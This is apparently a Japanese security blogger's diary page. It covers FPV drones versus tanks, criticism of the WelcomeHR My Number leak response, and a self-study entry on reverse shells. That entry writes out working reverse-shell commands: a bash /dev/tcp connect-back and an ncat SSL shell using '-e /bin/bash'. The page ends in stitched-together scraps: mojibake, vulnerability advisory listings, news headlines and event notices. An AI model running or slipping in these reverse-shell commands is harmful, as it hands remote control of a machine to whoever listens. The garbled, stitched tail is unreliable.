Last-modified: 2015-07-30 (木) 11:11:58 (3192d)
Link: Speaker(414d) Profile(867d) Committees(3033d) circle/Profile(3192d) 僕が技術士になった理由?(3207d) Profile/Detail(3469d) Papers(3836d) Books(4035d) wakatono/Profile(4301d) 僕がDr.になった理由?(4510d) Articles/Magazines(4734d) Someone/Profile(4744d) Articles/Web(4745d)
■ 2024.04.24
》 Do Tanks Have a Place in 21st-Century Warfare? (NYTimes, 4/20)。戦車不要論再び?
FPV = 一人称視点ドローン。DeepL 訳:
ワシントンのカーネギー国際平和財団でロシアとユーラシア・プログラムのシニアフェローを務めるマイケル・コフマン氏は、「現段階では、FPVを打ち負かすために使われる最も効果的な手段は、電子戦と、戦車に追加装甲やその他の種類の遮蔽物を付けるなど、さまざまな種類の受動的防御だ」と述べた。同氏は、FPVの撃破には「戦場でのオーダーメードのアプローチ」が必要であり、ウクライナ軍はそれに習熟しつつあると述べた。
いよいよ本格的な電子戦装備の塔載が必須になってくるのかな。
アフガンで IED が猛威をふるったときには装甲増加・耐爆構造化・IED jammer 装備で対抗したわけだけど、今回の戦訓を受けて、また新たな進化が必要になるのだろうなあ。
》 WelcomeHRのマイナンバーを含む個人情報漏洩事故の対応がひどい件(追記あり) (なか2656のblog, 4/14)。
確かにひどい。
第二に、この被害者あてのお詫びのメールを読むと、「マイナンバーについて(略)一方で、マイナンバーに記載されている情報(略)から、より詳しい個人情報を抜き取られることはありません。」と説明されていることは非常にミスリーディングなのではないでしょうか。
つまり、いわゆる名簿屋がこのような個人情報のデータセットを収集した場合、他で取得した複数の個人情報のデータセットと名寄せ・突合し、被害者本人の人物像を作り出し、それを販売するであるとか、プロファイリングを行う等の行為が可能となってしまいます(鈴木正朝・高木浩光・山本一郎『ニッポンの個人情報』224頁)。そしてマイナンバーは悉皆性・唯一無二性を有する究極のマスターキーなので、これが漏洩してしまうと他の個人情報のデータセットとの名寄せ・突合が容易になってしまいます。
にもかかわらず、まるで「マイナンバーが漏洩したけれどあまり心配はいりません」と言いたげなこのお詫びメールのアナウンスは非常に不適切であると思われます。
そのため、ワークスタイルテックは被害者の方々に対して、市役所等の自治体にマイナンバーカードの再発行を行うことを奨励すべきなのではないかと思われます(マイナンバー法17条5項参照、下の追記参照)。
マイナンバー漏洩の際にはセットで告知すべきだよなあ。
関連:
弊社サービスをご利用いただいているお客様への重要なご報告とお詫び (ワークスタイルテック, 3/29)
本来、お客様がストレージサーバーに保存するファイルの一覧は外部からアクセスできない仕様とすべきところ、当該サーバーのアクセス権限の誤設定により、閲覧可能な状態となっておりました。
当該誤設定により、ファイルの一覧の情報をもとに各ファイルをダウンロードすることも可能となっており、実際に第三者によるファイルのダウンロードが行われていたことが発覚いたしました。
まる見え系ですか。
情報セキュリティ基本方針 (ワークスタイルテック)
サービス品質保証制度(SLA) (ワークスタイルテック)
データ暗号化
通信については、SSLにて暗号化を行っています。 ※個人番号や機密情報は暗号化を行い、保管しています。 ※サーバー自体も暗号化しています。
ん? きちんと暗号化されていたら、
本件漏洩も問題が軽減される (状況によっては問題ないとすら言える) はずなのでは?
しかし告知文書には、そんな文言は一言もないよ?
どういうこと?
個人情報漏えいに関するご報告とお詫び (Leaf NxT, 4/22)
【対象となる個人データに係る本人の数】 26,829人
(中略)
なお、「WelcomeHR」から個人情報の漏えいが発生した時点において、当社とワークスタイルテック株式会社間における「WelcomeHR」利用に関する契約は終了していましたが、同契約の終了後も「WelcomeHR」において、本件に係る個人情報が保存されていたため、本件が発生するに至りました。
契約終了時におけるデータの速やかな削除の確認を怠った、ということかな。
■ 2024.04.22: 曇
》 reverse shell のおべんきょう
How-To Create a Reverse Shell: Bash Script Cheat Sheet (I/O Flood, 2023.11.26)。nc -lvnp 5555 と書かれているが、これだと
FreeBSD では機動しない。
マニュアルを見ると -p source_port であり listen port を指定するオプションではない。
起動しないのが正常。
というか、
なぜ Linux では機動するのか。謎。
nc -lvn 5555 で待ち受け、bash -i >& /dev/tcp/hostipaddress/5555 0>&1 で接続。
うまくいった。
Encrypted reverse shell using ncat (O'Reilly)、 Encrypted Reverse Shell for Pentester (Raj Chandel’s Blog Hacking Articles, 2021.04.05)。
FreeBSD では、ncat は nmap パッケージ
についてくるコマンド。
ncat -l 443 --ssl -v で 待ち受け、ncat hostipaddress 443 --ssl -e /bin/bash -v
で接続。プロンプトが出ないが、まあそういうもの。
‚Ž‚��D‚P‚S‚Q‚T�@‚Q‚O‚Q‚S”N‚SŒŽ‚Q‚O“ú
Lawmakers Are Kicking Warrantless Wiretapping Into Overdrive
Five Eyes Agencies Release New AI Security Guidance
Kremlin-Backed Actors Spread Disinformation Ahead Of US Elections
Phishing Platform LabHost Shut Down By Law Enforcement
Debian Security Advisory 5665-1
Posted Apr 18, 2024
Authored by Debian | Site debian.org
Debian Linux Security Advisory 5665-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.
tags | advisory, vulnerability
systems | linux, debian
Download | Favorite | View
Debian Security Advisory 5664-1
Posted Apr 18, 2024
Authored by Debian | Site debian.org
Debian Linux Security Advisory 5664-1 - Jetty 9 is a Java based web server and servlet engine. It was discovered that remote attackers may leave many HTTP/2 connections in ESTABLISHED state (not closed), TCP congested and idle. Eventually the server will stop accepting new connections from valid clients which can cause a denial of service.
tags | advisory, java, remote, web, denial of service, tcp
systems | linux, debian
Download | Favorite | View
Elber Wayber Analog/Digital Audio STL 4.00 Insecure Direct Object Reference
Posted Apr 18, 2024
Authored by LiquidWorm | Site zeroscience.mk
Elber Wayber Analog/Digital Audio STL version 4.00 suffers from an unauthenticated device configuration and client-side hidden functionality disclosure vulnerability.
Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass
Posted Apr 18, 2024
Authored by LiquidWorm | Site zeroscience.mk
Elber Wayber Analog/Digital Audio STL version 4.00 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security.suf
@WoodyTokyo woodytokyo
ƒZƒLƒ…ƒŠƒeƒB�S—�Šw“ü–å�@�@””„�i2020”N7ŒŽ10“ú�j‚Å‚·
「情報セキュリティ実践トレーニング June 2022」開催日程決定。
Windowsセキュリティの基礎 6月21日(火)
マルウェアとライブレスポンス 6月22日(水)
Active Directoryの攻撃と防御 6月23日(木)
ファイルシステム解析 6月24日(金)
You are being redirected... https://www.iwsec.org/csec/
Last modified: 2022-03-31T09:00+09:00
Change A record to 34.199.47.26
2016年12月01日 開催 12月1日〓12月2日開催 第13回情報プロフェッショナルシンポジウム(主催:国立研究開発法人 科学技術振興機構(JST)、一般社団法人情報科学技術協会(INF...